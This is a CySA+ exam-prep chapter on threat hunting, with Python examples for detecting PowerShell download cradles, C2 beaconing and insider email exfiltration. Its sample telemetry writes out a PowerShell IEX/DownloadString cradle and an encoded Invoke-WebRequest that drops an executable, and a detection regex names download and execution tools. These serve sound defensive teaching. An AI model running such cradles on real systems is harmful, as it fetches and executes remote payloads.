This chapter covers threat hunting techniques and hypothesis development, a critical skill for the CS0-003 exam's Security Operations domain (Objective 1.1). Approximately 15-20% of exam questions relate to proactive threat detection, including hunting methodologies, data sources, and analysis techniques. Mastering these concepts will enable you to identify advanced persistent threats (APTs) and insider threats that evade automated detection tools, and to design effective hunting programs in your organization.
Think of threat hunting as a detective re-opening a cold case. The security operations center (SOC) is like a police precinct that relies on emergency calls (alerts) to respond to crimes. But a proactive detective doesn't wait for calls; they review old case files, witness statements (logs), and forensic evidence (artifacts) to find patterns that were missed. They form a hypothesis: 'I suspect the burglar entered through the roof, not the door.' Then they collect evidence: check roof access logs, interview neighbors (network traffic), and look for tools (malware signatures). Each piece of evidence either supports or refutes the hypothesis. If supported, they escalate to an active investigation. If refuted, they form a new hypothesis. The detective uses known crime patterns (tactics, techniques, and procedures — TTPs) to guide their search, just as a hunter uses threat intelligence and the MITRE ATT&CK framework. The key difference from incident response is that hunting is proactive, not reactive. The detective doesn't wait for a 911 call; they actively seek out hidden threats. This analogy captures the iterative, hypothesis-driven, and evidence-based nature of threat hunting.
What is Threat Hunting?
Threat hunting is a proactive cybersecurity practice where analysts systematically search for signs of compromise that have evaded existing security controls, such as firewalls, antivirus, and SIEM rules. Unlike incident response, which reacts to alerts, hunting assumes a breach has already occurred and seeks to find it before it causes damage. The goal is to reduce dwell time, the period between initial compromise and discovery. Early Mandiant M-Trends reports put the average above 200 days; more recent M-Trends reports put the global median at a few weeks or less, which is still long enough for an attacker to move laterally and stage data for exfiltration.
The Hunting Maturity Model (HMM)
The HMM, developed by Sqrrl (acquired by Amazon in 2018), categorizes organizations into five levels:
- Level 0: Initial — Relies solely on automated alerts; no active hunting.
- Level 1: Minimal — Hunts based on threat intelligence feeds (e.g., known IoCs).
- Level 2: Procedural — Follows standardized hunting procedures but lacks automation.
- Level 3: Innovative — Creates custom hypotheses based on analytics and threat research.
- Level 4: Leading — Automates most hunting at scale using machine learning and big data analytics, freeing analysts to develop new hypotheses.
The CS0-003 exam expects you to understand that as maturity increases, hunting becomes more hypothesis-driven and less reliant on known indicators.
Hypothesis Development
A hypothesis is an educated guess about a potential threat activity. It drives the hunting process. Hypotheses typically come from three sources:
1. Threat Intelligence — e.g., "A new APT group is using PowerShell Empire; we might be infected."
2. Analytical Intuition — e.g., "Our DNS logs show unusual queries for non-existent domains; maybe there's C2 traffic."
3. Situational Awareness — e.g., "We just patched a critical VPN vulnerability; attackers may have exploited it before the patch."
The hypothesis must be testable, specific, and falsifiable. For example, "There is malware in our environment" is too vague. Better: "A user on the finance subnet has a process making outbound connections to a known malicious IP on port 443 every 30 minutes."
The Hunting Loop
Threat hunting follows an iterative cycle:
1. Form Hypothesis — Based on intelligence, analytics, or intuition.
2. Gather Data — Collect logs, network flows, endpoint telemetry, etc.
3. Analyze — Use tools like SIEM queries, packet captures, and EDR search.
4. Investigate — If evidence supports the hypothesis, escalate to incident response.
5. Document — Record findings, even if false positive, to improve future hunts.
6. Refine — Adjust the hypothesis and repeat.
Data Sources for Hunting
The exam tests knowledge of which data sources are most useful for hunting:
- Network Logs — Firewall, proxy, DNS, NetFlow. DNS logs are especially valuable for detecting C2 via DGA domains.
- Endpoint Logs — Windows Event Logs (Security, Sysmon), Linux auditd, macOS unified logs. Process creation events (Security Event ID 4688, or Sysmon Event ID 1) are critical; note that 4688 only carries the command line when "Include command line in process creation events" is enabled.
- Application Logs — Web server logs, database audit logs.
- Threat Intelligence Feeds — STIX/TAXII feeds, open-source intelligence (OSINT).
- Full Packet Capture — PCAP files for deep inspection.
Hunting Techniques
#### 1. Search-Based Hunting
Uses structured queries against log repositories. The same hunt ("which users launched PowerShell?") in three common query languages; field names depend on how the source is normalized (the Splunk Add-on for Microsoft Windows, for example, extracts New_Process_Name and Account_Name rather than NewProcessName and User, so check your own field extractions first):
- Splunk SPL: index=windows EventCode=4688 NewProcessName=*powershell* | stats count by User
- Elasticsearch Query DSL: {"query": {"bool": {"must": [{"match": {"event.code": "4688"}}, {"wildcard": {"process.name": "*powershell*"}}]}}}
- KQL (Microsoft Sentinel, formerly Azure Sentinel): SecurityEvent | where EventID == 4688 | where NewProcessName contains "powershell" | summarize count() by Account
#### 2. Hypothesis-Based Hunting
Uses the scientific method. For example, hypothesis: "An attacker is using scheduled tasks for persistence." Then query for new scheduled tasks created outside business hours, especially those running from user temp directories.
#### 3. Intelligence-Driven Hunting
Leverages indicators from threat reports. If a report mentions a specific registry run key value, hunt for that exact value across endpoints.
#### 4. Analytics-Driven Hunting
Uses statistical anomalies. For example, baseline normal user logon times and hunt for logons at 3 AM. Tools like User and Entity Behavior Analytics (UEBA) automate this.
The Role of MITRE ATT&CK
MITRE ATT&CK provides a common taxonomy of adversary behaviors. Hunters map hypotheses to ATT&CK techniques. For example, if you suspect credential dumping, you would focus on technique T1003 and look for access to LSASS memory (e.g., using Sysmon Event ID 10 for process access). The exam expects you to know that hunting is more effective when aligned with ATT&CK because it provides a structured way to cover all phases of an attack.
Indicators of Compromise (IoCs) vs. Indicators of Attack (IoAs)
IoCs are forensic artifacts like file hashes, IP addresses, domain names. They are reactive and cheap for an attacker to change (recompile a binary, rotate an IP or domain).
IoAs are behavioral patterns that indicate an attack in progress, such as unusual lateral movement or privilege escalation. Hunting focuses on IoAs because they are harder for attackers to change.
Tools and Platforms
Endpoint Detection and Response (EDR) — CrowdStrike, SentinelOne, Microsoft Defender for Endpoint. Provide real-time telemetry and search capabilities.
Security Information and Event Management (SIEM) — Splunk, ELK, Microsoft Sentinel (formerly Azure Sentinel). Centralize logs and enable historical searches.
Threat Intelligence Platforms (TIP) — MISP, ThreatConnect. Aggregate and correlate threat data.
Network Traffic Analysis (NTA) — Zeek, Suricata. Zeek turns raw traffic into structured protocol logs (conn.log, dns.log, http.log, ssl.log); Suricata is a signature-based IDS that also emits flow and protocol metadata. Both give hunters network evidence without storing full packet captures.
Key Metrics
Dwell Time — Days from initial compromise to discovery for a given intrusion. Hunting aims to reduce this.
Mean Time to Detect (MTTD) — Average time from compromise to detection across incidents over a period; in effect, dwell time averaged over the program.
Mean Time to Respond (MTTR) — Average time from detection to containment.
Hunting Cadence — How often hunts are performed (daily, weekly). The exam may ask about optimal cadence; it depends on risk appetite and resources.
Common Pitfalls
Assuming Alerts Are Sufficient — Automated detection misses novel attacks. Hunting fills the gap.
Over-Reliance on IoCs — Attackers change IoCs quickly. Focus on TTPs.
Poor Data Quality — Incomplete logs render hunting ineffective. Ensure logging is enabled and retained appropriately.
Lack of a Formal Process — Ad-hoc hunting produces inconsistent results. Follow a structured methodology like the Hunting Loop.
Verification Commands
On Windows endpoints, use Sysinternals tools:
- handle.exe -a -p lsass.exe — Lists the handles held by the LSASS process itself. Credential dumping shows up the other way around, as another process opening a handle to LSASS, which Sysmon Event ID 10 (ProcessAccess with TargetImage lsass.exe) or EDR telemetry captures far more reliably than a point-in-time handle listing.
- tcpview.exe — View active TCP connections.
- autoruns.exe — Review startup programs.
On Linux:
- lsof -i — List open network connections.
- ps aux --forest — View process tree.
- auditctl -l — List audit rules.
In Splunk:
index=windows EventCode=4688 NewProcessName=*cmd.exe* | table _time, User, CommandLine
Interaction with Incident Response
Hunting and incident response are complementary. Hunting may uncover evidence of a breach, which then triggers formal incident response. The hunter should preserve evidence and hand off to the response team. The exam tests the distinction: hunting is proactive, response is reactive.
Conclusion
Threat hunting is an advanced practice that requires a hypothesis-driven mindset, deep knowledge of attacker TTPs, and proficiency with security tools. By systematically searching for hidden threats, organizations can significantly reduce dwell time and improve their overall security posture. The CS0-003 exam will test your ability to apply these concepts in scenario-based questions.
Formulate a Hypothesis
Begin with a testable statement about potential malicious activity. For example, 'An attacker may have used PowerShell to download a payload from a remote server.' This hypothesis is based on a known TTP (T1059.001). The hypothesis should be specific enough to guide data collection and analysis. Avoid vague hypotheses like 'something bad might be happening.' Use threat intelligence, recent incidents, or anomalies as triggers. Document the hypothesis in a hunting plan.
Identify Data Sources
Determine which logs and telemetry can confirm or refute the hypothesis. For PowerShell downloads, relevant sources include the PowerShell Operational log (Event ID 4104 script block logging, 4103 module logging), Windows Security Event ID 4688 or Sysmon Event ID 1 process-creation events with command-line arguments, EDR process telemetry, and network proxy logs (URLs visited). Ensure data is available and of sufficient quality. If logs are missing, enable additional logging (e.g., PowerShell script block logging and "Include command line in process creation events") before hunting; a query against data that was never collected refutes nothing.
Collect and Analyze Data
Execute queries against the selected data sources. For example, search for PowerShell processes with URLs in the command line. In Splunk: `index=windows EventCode=4688 NewProcessName=*powershell* CommandLine=*http*`. Analyze the results for anomalies: unexpected source IPs, unusual times, or connections to known bad domains. Use statistical baselines to flag outliers. If the data volume is large, use aggregation and filtering.
Investigate Findings
For each potential hit, perform a deeper investigation. Check the parent process, user account, and network connections. Use timeline analysis to correlate events. For example, if a user ran PowerShell that connected to a suspicious IP, check if that IP is associated with known malware. If the evidence strongly supports the hypothesis, escalate to incident response. If inconclusive, refine the hypothesis and continue hunting.
Document and Refine
Record all findings, including false positives. Document the hypothesis, data sources, queries used, and outcomes. This documentation improves future hunts and helps build a knowledge base. If the hypothesis was confirmed, update threat intelligence and detection rules. If refuted, consider alternative hypotheses. The hunting loop then repeats, continuously improving the organization's detection capabilities.
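The five steps above, carried through end to end, as an added example (not code from the original chapter or from any vendor). It runs the PowerShell-download hunt offline over a handful of constructed process-creation records using Sysmon Event ID 1 style field names (Image, CommandLine, ParentImage, User); the field names, the sample events and the scoring weights are assumptions. It goes slightly beyond the text by also decoding -EncodedCommand payloads, since a URL hidden in base64 never appears in a plain CommandLine=*http* search.

```python
"""Hypothesis: an attacker used PowerShell to download a payload (ATT&CK T1059.001).

Added example for this chapter, not code from the original page or from any
vendor. It runs the five-step hunt offline over CONSTRUCTED process-creation
records using Sysmon Event ID 1 style field names (Image, CommandLine,
ParentImage, User); both the field names and the sample events are assumptions.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
# Download cradles and remote-execution primitives seen in the command line.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"Net\.WebClient|Invoke-Expression|\biex\b|Start-BitsTransfer",
    re.IGNORECASE,
)
# -EncodedCommand and its abbreviations, followed by a base64 blob.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
STEALTH_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noni\b", re.IGNORECASE)

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Parents from which a downloading PowerShell is suspicious: Office, script hosts, mshta.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or '' if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


@dataclass
class Finding:
    user: str
    parent: str
    score: int
    urls: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)


def score_event(ev: dict) -> Optional[Finding]:
    """Test one process-creation record against the hypothesis; None means 'no evidence'."""
    if basename(ev.get("Image", "")) not in POWERSHELL_IMAGES:
        return None
    cmdline = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = f"{cmdline} {decoded}"          # inspect both the raw and the decoded command
    parent = basename(ev.get("ParentImage", ""))
    f = Finding(user=ev.get("User", "?"), parent=parent, score=0, urls=URL_RE.findall(text))
    if f.urls:
        f.reasons.append("url in command line"); f.score += 2
    if CRADLE_RE.search(text):
        f.reasons.append("download/execution cradle"); f.score += 2
    if decoded:
        f.reasons.append("encoded command"); f.score += 1
    if parent in SUSPICIOUS_PARENTS:
        f.reasons.append(f"suspicious parent {parent}"); f.score += 2
    if STEALTH_RE.search(cmdline):
        f.reasons.append("hidden/non-interactive flags"); f.score += 1
    return f if f.score else None


def hunt(events: List[dict]) -> List[Finding]:
    """Steps 3-4: analyse every record, keep the hits, strongest evidence first."""
    hits = [f for f in map(score_event, events) if f]
    return sorted(hits, key=lambda f: -f.score)


# Constructed sample telemetry (not real data). Event 3 carries an encoded
# Invoke-WebRequest built here so the example stays self-contained.
ENCODED = base64.b64encode(
    "Invoke-WebRequest -Uri https://203.0.113.7/x -OutFile $env:TEMP\\x.exe".encode("utf-16-le")
).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"User": "CORP\\jdoe", "ParentImage": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a.ps1')\""},
    {"User": "CORP\\svc_deploy", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": PS,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\deploy\\patch.ps1"},
    {"User": "CORP\\asmith", "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -enc " + ENCODED},
    {"User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):   # step 5: document each hit with the evidence behind it
        print(f"score={f.score} user={f.user} parent={f.parent} urls={f.urls} reasons={f.reasons}")
```

Two design points worth noting. The deployment account's `-ExecutionPolicy Bypass -File` run scores zero and drops out: it is exactly the kind of legitimate administrative use that a bare `NewProcessName=*powershell*` search buries you in, and the hypothesis is about downloads, not about PowerShell. The Word-spawned cradle outranks the encoded one because parent process is evidence in its own right; the same weighting is what you would carry into the investigation step and, if confirmed, into a detection rule.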
Scenario 1: Detecting Cobalt Strike Beaconing
A large financial institution uses Splunk as its SIEM and CrowdStrike Falcon as EDR. The threat hunting team hypothesizes that an attacker may have deployed Cobalt Strike beacons, which exhibit periodic HTTPS beaconing with jitter. They create a Splunk query to find outbound connections from endpoints to external IPs on port 443 with a regular pattern of 60-second intervals plus random jitter. They use stats to calculate the standard deviation of connection times. They find one server with connections every 60-70 seconds to an IP in a cloud provider. The EDR shows that the process is svchost.exe running from a non-standard path. Investigation reveals a malicious DLL loaded via DLL side-loading. The incident response team is notified, and the beacon is removed. Dwell time was 45 days.
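The interval statistics the scenario describes, as an added example that is not part of the original chapter or of any vendor's product. It groups connections by (source, destination), computes the inter-arrival intervals, and scores each pair by the coefficient of variation (standard deviation divided by mean), which is what makes a 60 s sleep with a few seconds of jitter stand out from human browsing regardless of the absolute interval. The connection timestamps are constructed with a seeded generator; a real hunt would feed it firewall, proxy or Zeek conn.log records, and the thresholds are starting points, not defaults from any tool.

```python
"""Hypothesis: a host is beaconing to a C2 server at a fixed interval plus jitter.

Added example, not code from the original chapter or from any vendor. It scores
(source, destination) pairs by the regularity of their connection times using
the coefficient of variation (stdev / mean) of the inter-arrival intervals, over
CONSTRUCTED timestamps. A real hunt would feed it firewall, proxy or Zeek
conn.log records; the thresholds are starting points, not vendor defaults.
"""
import random
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, Optional, Tuple

Conn = Tuple[str, str, float]   # (src_host, dst_ip, epoch_seconds)


def intervals(timestamps: List[float]) -> List[float]:
    ts = sorted(timestamps)
    return [b - a for a, b in zip(ts, ts[1:])]


def beacon_stats(timestamps: List[float], min_connections: int = 10) -> Optional[Tuple[float, float]]:
    """Return (mean_interval, coefficient_of_variation), or None with too few samples."""
    if len(timestamps) < min_connections:
        return None
    iv = intervals(timestamps)
    m = mean(iv)
    if m <= 0:
        return None          # duplicate timestamps only; nothing to measure
    return m, pstdev(iv) / m


def find_beacons(conns: List[Conn], max_cv: float = 0.25, min_connections: int = 10) -> List[Dict]:
    """Flag pairs whose inter-arrival times are regular enough to look machine-driven."""
    groups: Dict[Tuple[str, str], List[float]] = defaultdict(list)
    for src, dst, t in conns:
        groups[(src, dst)].append(t)
    hits = []
    for (src, dst), ts in groups.items():
        stats = beacon_stats(ts, min_connections)
        if stats is None:
            continue
        interval, cv = stats
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "count": len(ts),
                         "interval_s": round(interval, 1), "cv": round(cv, 3)})
    return sorted(hits, key=lambda h: h["cv"])


def _series(src: str, dst: str, gaps: List[float], start: float = 1_700_000_000.0) -> List[Conn]:
    """Build a connection series from a list of inter-arrival gaps (constructed-data helper)."""
    out, t = [(src, dst, start)], start
    for g in gaps:
        t += g
        out.append((src, dst, t))
    return out


# Constructed sample connection log (not real traffic).
_rng = random.Random(7)
SAMPLE_CONNS: List[Conn] = (
    # Beacon: 60 s sleep with up to 10 s of jitter, as in the scenario.
    _series("app-srv-07", "203.0.113.55", [_rng.uniform(60, 70) for _ in range(40)])
    # Noisy beacon: 60 s sleep with 50% jitter; slips under the default threshold.
    + _series("ws-112", "198.51.100.9", [_rng.uniform(30, 90) for _ in range(40)])
    # Human browsing: bursty, irregular gaps.
    + _series("ws-044", "93.184.216.34", [3, 0.5, 120, 45, 2, 600, 8, 15, 1, 300, 30, 4])
    # Too few connections to judge.
    + _series("ws-044", "203.0.113.55", [61, 62, 60])
)

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_CONNS):
        print(hit)
```

With the default `max_cv=0.25` only the low-jitter beacon is flagged. The second series, built with 50% jitter, is the caveat: raising the jitter is a cheap way for an operator to defeat a tight regularity threshold, so loosening `max_cv` trades false negatives for false positives, and the count and destination context (a cloud-hosted IP nobody else on the network talks to) is what you use to break the tie. The Splunk equivalent is a `streamstats` over `_time` by src/dest to derive the gap, then `stats avg stdev count by src, dest`.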
Scenario 2: Insider Threat Data Exfiltration
A healthcare organization suspects an employee may be exfiltrating patient data via email. The hunting team hypothesizes that a user is sending unusually large volumes of email with attachments to external addresses. They query the email gateway logs for users with >50 emails per day and attachment sizes >10 MB. They find one user in accounting sending 200 emails daily to a personal Gmail address. The attachments are PDFs of patient records. The hunt leads to a formal investigation, and the employee is terminated. The key was baselining normal email behavior; the anomaly stood out clearly.
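The baselining step this scenario turns on, and the analytics-driven hunting the Hunting Techniques section describes, as one added example (not code from the original chapter or from any product). Each user is compared against their own history with a z-score, and a hit also has to clear an absolute floor, so a naturally high-volume sender is not flagged for a normal busy day and a tiny-volume account is not flagged for sending four more messages than usual. The email-gateway counts are constructed; the same shape of check applies to logon hours, bytes uploaded or DNS query counts.

```python
"""Hypothesis: one user's outbound email volume is far outside their own normal.

Added example, not from the original chapter or any product. It builds a
per-user baseline from historical daily counts and flags today's count only
when it is both a statistical outlier for that user (z-score) and above an
absolute floor, over CONSTRUCTED email-gateway counts.
"""
from statistics import mean, pstdev
from typing import Dict, List


def zscore(value: float, history: List[float], min_std: float = 1.0) -> float:
    """Standard score of value against the user's own history.

    A user whose history never varies has stdev 0, which would make any change
    look infinite; min_std floors the spread so tiny fluctuations stay quiet.
    """
    return (value - mean(history)) / max(pstdev(history), min_std)


def baseline_anomalies(history: Dict[str, List[int]], today: Dict[str, int],
                       z_threshold: float = 3.0, absolute_floor: int = 50,
                       min_days: int = 7) -> List[Dict]:
    """Return users whose count today is anomalous against their own baseline."""
    hits = []
    for user, count in today.items():
        hist = history.get(user, [])
        if len(hist) < min_days:
            continue                       # no baseline yet; needs a different check
        z = zscore(count, hist)
        if z >= z_threshold and count >= absolute_floor:
            hits.append({"user": user, "today": count,
                         "baseline_mean": round(mean(hist), 1), "z": round(z, 1)})
    return sorted(hits, key=lambda h: -h["z"])


# Constructed 14-day history of external emails with attachments per user (not real data).
HISTORY: Dict[str, List[int]] = {
    "CORP\\mlee":     [8, 12, 10, 9, 11, 7, 10, 13, 9, 10, 8, 12, 11, 9],         # accounting
    "CORP\\rkhan":    [60, 75, 58, 90, 70, 65, 80, 72, 68, 77, 85, 62, 74, 69],   # marketing, high volume
    "CORP\\helpdesk": [5] * 14,                                                  # constant
    "CORP\\newhire":  [2, 3, 1],                                                 # three days only
}
TODAY: Dict[str, int] = {"CORP\\mlee": 200, "CORP\\rkhan": 95,
                         "CORP\\helpdesk": 9, "CORP\\newhire": 40}

if __name__ == "__main__":
    for hit in baseline_anomalies(HISTORY, TODAY):
        print(hit)
```

Only the accounting user surfaces. The marketing user sends 95 messages, well past the scenario's ">50 per day" rule, but that is under three standard deviations from their own mean, which is why a fixed population-wide threshold alone produces the false positives the Edge Cases section warns about. Users with too little history are skipped rather than scored; new accounts need a peer-group baseline instead, which is a separate hypothesis.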
Scenario 3: Living-off-the-Land (LotL) Attack
A tech company uses Microsoft Defender for Endpoint. The hunt team hypothesizes that an attacker is using legitimate administrative tools (wmic, mshta, regsvr32) for malicious purposes. They create a custom detection rule in Defender for Endpoint that triggers when wmic is used to create a process on a remote machine (lateral movement). Within a week, the rule fires on a workstation where wmic was used to launch cmd.exe on a server. The user account was compromised via phishing. The attack was stopped before data exfiltration. This demonstrates the importance of hunting for TTPs rather than IoCs.
Common Misconfigurations
Insufficient Logging — Many organizations do not enable PowerShell script block logging (Event ID 4104) or "Include command line in process creation events" (which populates the command line in Event ID 4688), so LotL activity never reaches the SIEM and hunts that key on command-line content return nothing.
Short Log Retention — Logs kept for only 30 days may miss long-dwell threats.
Siloed Data — Network and endpoint logs in separate systems hinder correlation.
Performance Considerations
Hunting queries can be resource-intensive. Schedule heavy queries during off-peak hours. Use indexed fields to speed up searches. In Splunk, limit the time range and use tstats over indexed fields or accelerated data models for faster aggregations. In EDR consoles, start from pre-built queries and avoid leading wildcards (*powershell*), which defeat the index and force a scan of every record.
What CS0-003 Tests
Objective 1.1 (Security Operations) includes threat hunting techniques and hypothesis development. The exam expects you to:
Differentiate between proactive hunting and reactive incident response.
Understand the Hunting Maturity Model (HMM) levels.
Know the steps of the hunting loop.
Identify appropriate data sources for specific hypotheses.
Recognize the difference between IoCs and IoAs.
Apply the MITRE ATT&CK framework to structure hunts.
Common Wrong Answers
"Threat hunting is the same as vulnerability scanning." — Wrong. Vulnerability scanning identifies known weaknesses; hunting looks for active compromise.
"Hunting should only be done after an alert." — Wrong. Hunting is proactive, not reactive.
"The best data source for hunting is antivirus logs." — Wrong. Antivirus logs are limited; network and endpoint logs are more valuable.
"A hypothesis is not needed; you can just search for all malicious activity." — Wrong. Without a hypothesis, the search is unfocused and inefficient.
Specific Numbers and Terms
Dwell time — early Mandiant M-Trends reports put the average above 200 days; recent M-Trends reports put the global median at a few weeks or less. Hunting aims to reduce it.
HMM levels — 0 to 4; be able to identify characteristics of each.
MITRE ATT&CK — roughly 200 enterprise techniques plus several hundred sub-techniques; know common ones like T1059 (Command and Scripting Interpreter, with T1059.001 PowerShell), T1003 (OS Credential Dumping), T1041 (Exfiltration Over C2 Channel).
Sysmon Event IDs — 1 (process creation), 3 (network connection), 10 (process access, e.g., a handle opened to lsass.exe), 11 (file creation), 12/13 (registry object create/delete and value set).
Windows Event IDs — 4688 (process creation), 4103 (PowerShell module logging, pipeline execution details), 4104 (PowerShell script block logging), 5156 (Windows Filtering Platform permitted connection).
Edge Cases
False positives — Hunting often yields many false positives. The exam may ask how to reduce them: use baselines, whitelists, and context.
Encrypted traffic — Hunting for malicious content in encrypted traffic requires TLS inspection (decryption at a proxy or the endpoint) or falling back to metadata the encryption does not hide: SNI and certificate details, JA3/JA4 client fingerprints, byte counts and connection timing. Application certificate pinning works against the hunter here, because pinned clients refuse an inspecting proxy's certificate.
Cloud environments — Hunting in AWS/Azure requires different data sources (CloudTrail, VPC Flow Logs, Azure Activity Log).
How to Eliminate Wrong Answers
If an answer suggests waiting for an alert, it's wrong — hunting is proactive.
If an answer focuses on patching or configuration, it's likely vulnerability management, not hunting.
If an answer mentions only IoCs, it's less effective than TTP-based hunting.
The correct answer often involves a specific hypothesis and data source.
Threat hunting is proactive; incident response is reactive.
The Hunting Maturity Model has five levels (0-4); Level 4 (Leading) automates most hunting at scale, with analysts concentrating on new hypotheses.
A hypothesis must be specific, testable, and falsifiable.
MITRE ATT&CK provides a structured taxonomy for hunting hypotheses.
Key data sources: Windows Event Logs, Sysmon, DNS logs, EDR telemetry.
IoAs (indicators of attack) are behavioral; IoCs are forensic artifacts.
The hunting loop: Form hypothesis → Gather data → Analyze → Investigate → Document → Refine.
Common hunting techniques: search-based, hypothesis-based, intelligence-driven, analytics-driven.
Dwell time reduction is a primary goal of hunting.
Document all findings, including false positives, to improve future hunts.
These come up on the exam all the time. Here's how to tell them apart.
Hypothesis-Driven Hunting
Begins with a testable hypothesis about adversary behavior.
Focuses on TTPs and behavioral patterns.
More effective against advanced persistent threats.
Requires deep understanding of attacker methodologies.
Produces longer-lasting detection value.
IoC-Driven Hunting
Searches for known indicators like file hashes or IPs.
Reactive and easily evaded by changing IoCs.
Suitable for commodity malware.
Can be automated with threat intelligence feeds.
Indicators become obsolete quickly.
Mistake
Threat hunting is the same as incident response.
Correct
Incident response is reactive — it begins after a confirmed incident. Threat hunting is proactive — it seeks potential incidents before they are detected by automated tools. They are complementary but distinct processes.
Mistake
You need expensive commercial tools to hunt effectively.
Correct
While tools like EDR and SIEM help, effective hunting can be done with free tools like Sysmon, Zeek, and ELK. The key is having quality data and a structured process, not the tool cost.
Mistake
Hunting always starts with a known indicator of compromise.
Correct
Advanced hunting starts with a hypothesis about attacker behavior (TTPs), not specific IoCs. IoC-based hunting is reactive and easily evaded. Hypothesis-driven hunting is more robust.
Mistake
If no alerts are triggered, there is no threat.
Correct
Automated alerts only catch known patterns. Sophisticated attackers can evade detection. Hunting assumes a breach may exist and actively searches for subtle signs that alerts miss.
Mistake
Hunting should be performed only by senior analysts.
Correct
While senior analysts bring valuable experience, junior analysts can also contribute by following structured hunting procedures and using playbooks. The key is training and a mature process.
Threat hunting is proactive — you search for threats that may have evaded detection, without waiting for an alert. Incident response is reactive — you respond after a confirmed incident. Hunting reduces dwell time, while response contains and eradicates the threat. Both are part of a mature security operations program.
The typical hunting loop includes: (1) Form a hypothesis based on intelligence, analytics, or intuition. (2) Identify and collect relevant data sources. (3) Analyze the data using queries and tools. (4) Investigate any findings that support the hypothesis. (5) Document results and refine the hypothesis. This cycle repeats continuously.
Critical data sources include Windows Event Logs (especially Security and Sysmon), DNS logs, network flow data (NetFlow/IPFIX), proxy logs, EDR telemetry (process creation, network connections, file events), and full packet capture. The best source depends on the hypothesis. For example, hunting for lateral movement often uses Windows Event ID 4624 (logon) and 4688 (process creation).
MITRE ATT&CK provides a comprehensive matrix of adversary tactics and techniques. Hunters can use it to structure hypotheses by technique (e.g., T1059 for command scripting). It ensures coverage across the attack lifecycle and helps prioritize hunts based on threat intelligence. The exam expects you to map hunting activities to ATT&CK techniques.
The HMM, developed by Sqrrl, defines five levels of hunting capability: Level 0 (Initial) — relies on automated alerts; Level 1 (Minimal) — uses threat intelligence feeds; Level 2 (Procedural) — follows standardized procedures; Level 3 (Innovative) — creates custom hypotheses; Level 4 (Leading) — automates hunting at scale. The exam may ask you to identify an organization's maturity level based on a description.
IoAs (Indicators of Attack) are behavioral patterns that suggest an attack is in progress, such as unusual lateral movement or privilege escalation. IoCs (Indicators of Compromise) are forensic artifacts like file hashes or IP addresses. IoAs are more valuable for hunting because they are harder for attackers to change and provide earlier detection.
Yes, at higher maturity levels (HMM Level 4), hunting can be automated using machine learning and big data analytics to continuously search for anomalies. However, human intuition and creativity remain important for forming hypotheses. Automation handles repetitive searches, while analysts focus on complex investigations.